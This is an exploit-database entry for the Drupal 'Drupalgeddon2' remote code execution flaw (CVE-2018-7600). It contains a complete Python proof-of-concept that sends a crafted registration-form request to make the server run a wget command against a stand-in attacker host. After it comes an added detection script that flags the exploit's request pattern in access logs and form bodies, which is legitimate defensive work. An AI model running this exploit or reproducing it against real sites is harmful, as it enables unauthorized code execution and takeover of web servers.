Vulnerability Summary

Vulnerability title:
Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 – 'Drupalgeddon2' Remote Code Execution (PoC)

Submitted:
2018-04-13

Severity:

Vendor:

Category:
Exploit published

Followers:
18 people following

Vulnerability Details

EDB-ID: 44448
Author: Vitalii Rudnykh
Published: 2018-04-13
CVE: CVE-2018-7600
Type: Webapps
Platform: PHP
Aliases: N/A
Advisory/Source: Link
Tags: N/A

E-DB Verified: Waiting verification

Vulnerable App: N/A

#!/usr/bin/env python2
import sys
import requests

print ('################################################################')
print ('# Proof-Of-Concept for CVE-2018-7600')
print ('# by Vitalii Rudnykh')
print ('# Thanks by AlbinoDrought, RicterZ, FindYanot, CostelSalanders')
print ('# https://github.com/a2u/CVE-2018-7600')
print ('################################################################')
print ('Provided only for educational or information purposes\n')

target = raw_input('Enter target url (example: https://domain.ltd/): ')

url = target + 'user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax' 
payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'wget http://attacker/hello.txt'}

r = requests.post(url, data=payload)
if r.status_code != 200:
  sys.exit("Not exploitable")
print ('\nCheck: '+target+'hello.txt')
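
The request sent by the PoC above has a recognisable shape: an `element_parents` path containing `%23` (`#`) together with `ajax_form=1`, and form field names with `#`-prefixed array keys. The detection sketch below is an added example, not part of the original exploit entry. Its function names, sample log lines, sample body and addresses are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, parse_qsl

# Request field of a combined-format access log line: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Constructed sample data (not taken from a real server).
SAMPLE_LOG = [
    '192.0.2.10 - - [13/Apr/2018:10:00:01 +0000] "GET /user/register HTTP/1.1" 200 5123',
    '198.51.100.7 - - [13/Apr/2018:10:00:05 +0000] "POST /user/register'
    '?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
    ' HTTP/1.1" 200 312',
    '192.0.2.10 - - [13/Apr/2018:10:00:09 +0000] "POST /node/add/article'
    '?element_parents=field_image/widget/0&ajax_form=1&_wrapper_format=drupal_ajax'
    ' HTTP/1.1" 200 208',
]
SAMPLE_BODY = ("form_id=user_register_form&_drupal_ajax=1"
               "&mail%5B%23post_render%5D%5B%5D=PLACEHOLDER&mail%5B%23type%5D=markup")


def query_is_suspicious(target):
    """True if an AJAX form request walks into a '#'-prefixed render-array property."""
    query = parse_qs(target.partition("?")[2], keep_blank_values=True)
    # parse_qs percent-decodes, so %23 in the raw URL shows up here as '#'.
    parents = query.get("element_parents", [])
    return "ajax_form" in query and any("#" in p for p in parents)


def body_property_keys(body):
    """Field names in a urlencoded body that use '#'-prefixed keys, e.g. mail[#type]."""
    names = [name for name, _ in parse_qsl(body, keep_blank_values=True)]
    return [n for n in names if re.search(r"(^|\[)#", n)]


def scan_access_log(lines):
    """Return (line_number, method, target) for every suspicious request line."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if match and query_is_suspicious(match.group("target")):
            hits.append((number, match.group("method"), match.group("target")))
    return hits


if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print("suspicious request on log line %d: %s %s" % hit)
    print("property-style body keys:", body_property_keys(SAMPLE_BODY))
```

Access logs normally omit POST bodies, so `body_property_keys` is meant for a WAF rule or reverse-proxy hook that can see the form data, while `scan_access_log` works on logs already on disk.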
